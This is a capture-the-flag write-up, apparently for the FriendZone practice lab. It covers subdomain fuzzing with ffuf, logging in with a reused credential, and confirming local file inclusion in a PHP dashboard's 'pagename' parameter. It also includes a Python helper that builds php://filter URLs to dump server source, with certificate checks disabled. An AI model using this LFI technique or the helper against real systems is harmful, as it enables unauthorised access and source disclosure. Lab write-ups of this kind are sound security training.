Web
Nmap discovered a web server running on the target, on port 80 and port 443
The service is Apache httpd 2.4.29, with the port 443 listener serving SSL/TLS
The SSL certificate enumerated from the HTTPS listener has a CN that looks like a domain name
I appended it to the /etc/hosts file on Kali for local DNS resolution
DNS
After laying out the two domain zones (friendzone.red and friendzoneportal.red) and their sub-domains, I realized that none of them are served over plain HTTP, only over HTTPS.
The Apache instance on port 80 does not serve these virtual hosts; they only answer on the HTTPS listener on port 443, where a request for the right name returns the actual resource.
friendzone.red
The webroot of friendzone.red over HTTPS finally shows something other than the base web root image.
This meme indicates that the other domain zone (friendzoneportal.red) may contain something critical to this operation
The source code points out that the /js/js directory contains some development stuff
friendzone.red/js/js
The /js/js directory reveals that the developer is testing some functions along with what appears to be a base64 string
The source code has a very ambiguous comment
┌──(kali㉿kali)-[~/archive/htb/labs/friendzone]
└─$ echo 'RnNZV3lsYW9QSzE2NzQ3MDQ2MjRJdWJqa3JRN3dP' | base64 -d
FsYWylaoPK1674704624IubjkrQ7wO
┌──(kali㉿kali)-[~/archive/htb/labs/friendzone]
└─$ echo 'RnNZV3lsYW9QSzE2NzQ3MDQ2MjRJdWJqa3JRN3dP' | base64 -d | base64 -d
<unprintable bytes>base64: invalid input
Decoding it a second time yields nothing readable: the decoded string is 30 characters with no padding, so it is not a complete base64 value and base64 rejects it. I don't know what this string is for now, but I will keep it in the back of my mind
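As an added example (not code from the original write-up), the same decode-until-unreadable check in Python, which also pulls the 10-digit run 1674704624 out of the decoded string: it has the shape of a Unix epoch, the same shape as the Final Access timestamp that dashboard.php prints later on. The input string is the one from the page; the epoch range bounds and the printable-text rule are my own choices.

```python
import base64
import binascii
import re
import string
from datetime import datetime, timezone

# Constructed input for this example: the base64 string found in the /js/js source.
JS_STRING = "RnNZV3lsYW9QSzE2NzQ3MDQ2MjRJdWJqa3JRN3dP"

# Characters accepted as "text"; tab/newline are fine, other control bytes are not.
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_layers(value: str, max_depth: int = 5) -> list:
    """Decode base64 repeatedly and return each layer that is still readable text.

    Stops when a layer is not valid base64 or decodes to non-ASCII/unprintable
    bytes, which is exactly where `base64 -d | base64 -d` gave up on the shell.
    Missing padding is added so an unpadded layer is still attempted.
    """
    layers = []
    current = value.strip()
    for _ in range(max_depth):
        padded = current + "=" * (-len(current) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            break  # not base64 at all
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            break  # binary output: this was the last text layer
        if not text or any(ch not in PRINTABLE for ch in text):
            break
        layers.append(text)
        current = text
    return layers


def find_epoch(text: str) -> list:
    """Return standalone 10-digit runs that fall in a plausible Unix-epoch
    range (1e9..2e9, roughly 2001 to 2033; an assumed bound)."""
    return [int(m) for m in re.findall(r"(?<!\d)\d{10}(?!\d)", text)
            if 1_000_000_000 <= int(m) < 2_000_000_000]


def epoch_to_utc(ts: int) -> str:
    """Render an epoch as an ISO-8601 UTC timestamp."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(JS_STRING), 1):
        print(f"layer {depth}: {layer}")
        for ts in find_epoch(layer):
            print(f"  embedded epoch {ts} -> {epoch_to_utc(ts)}")
```

The loop stops after one layer for this string, matching the shell: the second decode produces bytes that are not text. Whether the embedded digits are really a timestamp is still a guess; the helper only shows the value reads as one.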
fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 238, Words: 23, Lines: 15, Duration: 27ms]
admin [status: 301, Size: 318, Words: 20, Lines: 10, Duration: 27ms]
js [status: 301, Size: 315, Words: 20, Lines: 10, Duration: 26ms]
Fuzzing the web root reveals 2 directories. The /js/ directory is already known from the comment, but /admin/ is new.
friendzone.red/admin/
Directory indexing is enabled at /admin/, but the directory is empty.
friendzone.red/js/
The /js/ directory only has the other sub-directory, /js/js/, which was revealed from the comment
administrator1.friendzone.red
It’s a login page at administrator1.friendzone.red over HTTPS
Testing weak/default credentials fails. I get redirected to /login.php and it says Wrong!
Trying the credential that I got from the SMB share earlier.
It worked! and it points to /dashboard.php
Before heading over to /dashboard.php, I will fuzz the web root to get an idea of how it is structured.
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://administrator1.friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://administrator1.friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 2873, Words: 393, Lines: 123, Duration: 29ms]
images [status: 301, Size: 349, Words: 20, Lines: 10, Duration: 28ms]
login.php [status: 200, Size: 7, Words: 2, Lines: 1, Duration: 31ms]
dashboard.php [status: 200, Size: 101, Words: 12, Lines: 1, Duration: 32ms]
timestamp.php [status: 200, Size: 36, Words: 5, Lines: 1, Duration: 29ms]
:: Progress: [882188/882188] :: Job [1/1] :: 1226 req/sec :: Duration: [0:23:12] :: Errors: 0 ::
ffuf found a directory and 3 PHP files
administrator1.friendzone.red/dashboard.php
The /dashboard.php file appears to be a PHP application written by a beginner developer
It complains that the image_name parameter is missing and asks for it in order to show the image
It also states that the default is image_id=a.jpg&pagename=timestamp
So image_id and pagename are the actual parameters, even though the message names image_name
That looks like it could be abused for LFI
The Inclusion
Supplying image_id=a.jpg&pagename=timestamp indeed includes the a.jpg image and the output of timestamp, displayed as Final Access timestamp is 1674710768
My guess is that
- the image_id parameter is prefixed with the /images/ directory it includes from
- the pagename parameter has the .php suffix appended to it
administrator1.friendzone.red/timestamp.php
Yeap.
There is a file named, timestamp.php, which was also enumerated from fuzzing earlier
So this means that the pagename parameter includes and executes PHP code.
pagename alone
Funny thing is that if I don’t supply the image_id parameter, it doesn’t work.
I guess that is what it meant by “image_name param is missed !”
It would mean that image_id parameter must be supplied.
image_id alone
While I am unable to load a PHP page with the pagename parameter without supplying the image_id parameter, I can still load images with the image_id parameter alone, without pagename. That is b.jpg. Author's got jokes
LFI
The default it gives away consists of 2 parameters
One is image_id, and the other one is pagename
- The image_id parameter is likely passed to PHP's include() to load a.jpg from the pre-assigned directory, /images/
  - But the image_id parameter doesn't appear to be vulnerable to LFI/RFI; fuzzing it turned up nothing
- The pagename parameter is also passed to include(), with a pre-assigned extension (.php) appended
Just to confirm, I will try loading other PHP files through the pagename parameter
I tried loading dashboard.php, but the request just hangs.
That doesn't mean the LFI failed: dashboard.php is almost certainly including itself, and include() has no guard against re-including the same file, so the request loops until PHP times out.
So what if I supply another PHP script to the pagename parameter?
Supplying login as the pagename gives back the Wrong ! that login.php returned when I failed to authenticate, so the included file really is executed
LFI confirmed!
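As an added example (not code from the write-up or from the target application), a small Python helper for the pagename include: it builds the dashboard URL with the required image_id, wraps the target in the php://filter base64 wrapper so the included file is returned as source instead of being executed, and decodes the result. The vhost, script and parameter names come from the page; the session cookie value and the sample response body are assumptions constructed for offline use. php://filter does not depend on allow_url_include, but it only works here because the application appends .php without prepending a directory to pagename.

```python
import base64
import re
import ssl
import urllib.parse
import urllib.request
from typing import Optional

# Vhost and script from the page. Any session cookie is passed in by the caller;
# its name and value are not known here and are an assumption.
DASHBOARD = "https://administrator1.friendzone.red/dashboard.php"


def build_include_url(pagename: str, image_id: str = "a.jpg", base: str = DASHBOARD) -> str:
    """Build the dashboard URL. image_id must be present or the include is
    skipped, and pagename is given without .php because the script appends it."""
    query = urllib.parse.urlencode({"image_id": image_id, "pagename": pagename})
    return f"{base}?{query}"


def source_read_url(script: str, **kwargs) -> str:
    """Wrap the include target in php://filter so PHP base64-encodes the file and
    returns it instead of executing it. The application still appends .php, so
    the resource is named without its extension (login -> login.php)."""
    wrapper = f"php://filter/convert.base64-encode/resource={script}"
    return build_include_url(wrapper, **kwargs)


# A base64 run long enough not to match ordinary words in the surrounding HTML.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def extract_source(body: str) -> Optional[str]:
    """Pull the longest base64 run out of the response body and decode it."""
    runs = _B64_RUN.findall(body)
    if not runs:
        return None
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


def fetch(url: str, cookie: Optional[str] = None) -> str:
    """GET over HTTPS without certificate checks (the lab host uses its own
    certificate); never disable verification against a production target."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed response for offline use: what the dashboard page would carry once
# the include has been replaced by the base64 of a tiny script.
SAMPLE_SOURCE = '<?php echo "Wrong !"; ?>'
SAMPLE_BODY = "<p>image here</p>\n" + base64.b64encode(SAMPLE_SOURCE.encode()).decode() + "\n"


if __name__ == "__main__":
    print(build_include_url("timestamp"))
    print(source_read_url("login"))
    print(extract_source(SAMPLE_BODY))
    # Live use (cookie value is an assumption, supply your own):
    # print(extract_source(fetch(source_read_url("dashboard"), cookie="name=value")))
```

Reading dashboard.php through the filter wrapper is also how to see why the plain include of it hangs: the encoded output is returned instead of the file being run, so no recursion happens.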
I will continue enumerating other sub-domains
hr.friendzone.red
hr.friendzone.red over HTTPS is empty
uploads.friendzone.red
The web root of uploads.friendzone.red over HTTPS is a file upload page
I got a strong feeling that this page is vulnerable to arbitrary file upload after confirming the LFI earlier
I will upload a test file
It sends out a POST request to the /upload.php file along with the data
The confirmation contains a string of digits. Is it re-naming the uploaded file?
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://uploads.friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://uploads.friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 391, Words: 42, Lines: 14, Duration: 28ms]
files [Status: 301, Size: 334, Words: 20, Lines: 10, Duration: 30ms]
upload.php [Status: 200, Size: 38, Words: 8, Lines: 1, Duration: 31ms]
There is a /files/ directory
uploads.friendzone.red/files/
The /files/ directory is just empty
I get a 404 if I append that string of digits from the upload confirmation to /files/.
So the digits are not the renamed filename of the upload
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://uploads.friendzone.red:443/files/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://uploads.friendzone.red:443/files/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 29ms]
note [Status: 200, Size: 20, Words: 3, Lines: 2, Duration: 238ms]
Fuzzing the /files/ directory reveals a file within, /files/note
uploads.friendzone.red/files/note
It says that it's under development.
So I guess this is a dead end
Moving on
friendzoneportal.red
Zone Transferred!
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://friendzoneportal.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://friendzoneportal.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 66, Words: 5, Lines: 6, Duration: 27ms]
ffuf found nothing.
admin.friendzoneportal.red
admin.friendzoneportal.red over HTTPS is a login page
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://admin.friendzoneportal.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://admin.friendzoneportal.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 379, Words: 23, Lines: 18, Duration: 27ms]
login.php [status: 200, Size: 7, Words: 1, Lines: 1, Duration: 30ms]
ffuf found a new file: login.php
admin.friendzoneportal.red/login.php
It says that the page isn't developed yet.
files.friendzoneportal.red
It’s empty
imports.friendzoneportal.red
It’s empty as well
vpn.friendzoneportal.red
It’s also empty